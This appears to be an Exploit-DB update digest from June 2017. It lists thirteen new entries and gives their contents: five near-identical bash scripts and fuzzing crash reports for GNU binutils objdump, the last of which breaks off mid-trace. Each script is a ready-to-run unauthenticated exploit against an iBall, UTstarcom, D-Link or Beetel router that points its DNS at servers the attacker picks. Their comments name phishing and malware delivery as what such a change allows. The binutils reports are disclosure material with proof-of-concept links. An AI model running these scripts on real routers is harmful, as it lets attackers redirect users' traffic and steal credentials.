DB: 2017-06-20

13 new exploits

GNU binutils - 'rx_decode_opcode' Buffer Overflow
GNU binutils - 'disassemble_bytes' Heap Overflow
GNU binutils - 'bfd_get_string' Stack Buffer Overflow
GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow
GNU binutils - 'ieee_object_p' Stack Buffer Overflow
GNU binutils - 'print_insn_score16' Buffer Overflow
GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow
iBall Baton iB-WRA150N - Unauthenticated DNS Change
nuevoMailer 6.0 - SQL Injection
UTstarcom WA3002G4 - Unauthenticated DNS Change
D-Link DSL-2640U - Unauthenticated DNS Change
Beetel BCM96338 Router - Unauthenticated DNS Change
D-Link DSL-2640B - Unauthenticated Remote DNS Change

files.csv

@@ -5548,6 +5548,13 @@ id,file,description,date,author,platform,type,port
 42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
 42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
 42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
+42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42201,platforms/linux/dos/42201.txt,"GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -38016,3 +38023,9 @@ id,file,description,date,author,platform,type,port
 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0
 42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0
 42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0
+42192,platforms/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps,0
+42193,platforms/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps,0
+42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
+42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0

platforms/hardware/webapps/42192.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+#          iBall Baton iB-WRA150N 
+#   Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
+#  https://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "               iBall Baton iB-WRA150N " 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ==================================================================="
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+

platforms/hardware/webapps/42194.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+#            UTstarcom  WA3002G4 
+#   Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+#  https://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "               UTstarcom WA3002G4 " 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ==================================================================="
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+

platforms/hardware/webapps/42195.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+#   D-Link ADSL DSL-2640U IM_1.00
+#   Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+#  https://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "               D-Link ADSL DSL-2640U IM_1.00 " 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ==================================================================="
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+

platforms/hardware/webapps/42196.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+#   Beetel BCM96338 ADSL Router
+#   Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+#  https://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "               Beetel BCM96338 ADSL Router " 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ==================================================================="
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+

platforms/hardware/webapps/42197.sh

@@ -0,0 +1,82 @@
+#!/bin/bash
+#
+#   D-Link ADSL DSL-2640B GE_1.07
+#   Unauthenticated Remote DNS Change Exploit
+#
+#  Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
+#  https://www.ethical-hacker.org/
+#  https://www.facebook.com/ethicalhackerorg
+#
+#  Description:  
+#  The vulnerability exist in the web interface, which is 
+#  accessible without authentication. 
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  Disclaimer:
+#  This or previous programs is for Educational 
+#  purpose ONLY. Do not use it without permission. 
+#  The usual disclaimer applies, especially the 
+#  fact that Todor Donev is not liable for any 
+#  damages caused by direct or indirect use of the 
+#  information or functionality provided by these 
+#  programs. The author or any Internet provider 
+#  bears NO responsibility for content or misuse 
+#  of these programs or any derivatives thereof.
+#  By using these programs you accept the fact 
+#  that any damage (dataloss, system crash, 
+#  system compromise, etc.) caused by the use 
+#  of these programs is not Todor Donev's 
+#  responsibility.
+#   
+#  Use them at your own risk!
+#
+#  
+
+if [[ $# -gt 3 || $# -lt 2 ]]; then
+        echo "               D-Link ADSL DSL-2640B GE_1.07 " 
+        echo "           Unauthenticated Remote DNS Change Exploit"
+        echo "  ==================================================================="
+        echo "  Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
+        echo "  Example: $0 133.7.133.7 8.8.8.8"
+        echo "  Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
+        echo ""
+        echo "      Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
+        echo "  https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
+        exit;
+fi
+GET=`which GET 2>/dev/null`
+if [ $? -ne 0 ]; then
+        echo "  Error : libwww-perl not found =/"
+        exit;
+fi
+        GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
+

platforms/linux/dos/42198.txt

@@ -0,0 +1,43 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21587
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.min
+Output: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.txt
+
+Error in "rx_decode_opcode": global-buffer-overflow
+  in rx_decode_opcode at opcodes/rx-decode.opc:288
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-decode.opc#L288)
+  in print_insn_rx at opcodes/rx-dis.c:123
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-dis.c#L123)
+  in disassemble_bytes at binutils/objdump.c:1864
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42198.zip

platforms/linux/dos/42199.txt

@@ -0,0 +1,78 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min
+Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+  in disassemble_bytes at binutils/objdump.c:1993
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min
+Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+  in disassemble_bytes at binutils/objdump.c:1932
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min
+Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt
+
+Error in "disassemble_bytes": heap-buffer-overflow
+  in disassemble_bytes at binutils/objdump.c:1926
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42199.zip

platforms/linux/dos/42200.txt

@@ -0,0 +1,41 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min
+Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt
+
+Error in "bfd_get_string": stack-buffer-overflow
+  in bfd_get_string at bfd/ieee.c:198
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198)
+  in read_id at bfd/ieee.c:227
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227)
+  in ieee_object_p at bfd/ieee.c:1907
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907)
+  in bfd_check_format_matches at bfd/format.c:311
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
+  in display_object_bfd at binutils/objdump.c:3602
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
+  in display_any_bfd at binutils/objdump.c:3693
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42200.zip

platforms/linux/dos/42201.txt

@@ -0,0 +1,70 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min
+Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt
+
+Error in "decode_pseudodbg_assert_0": global-buffer-overflow
+  in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604)
+  in _print_insn_bfin at opcodes/bfin-dis.c:4760
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
+  in print_insn_bfin at opcodes/bfin-dis.c:4778
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
+  in disassemble_bytes at binutils/objdump.c:1864
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
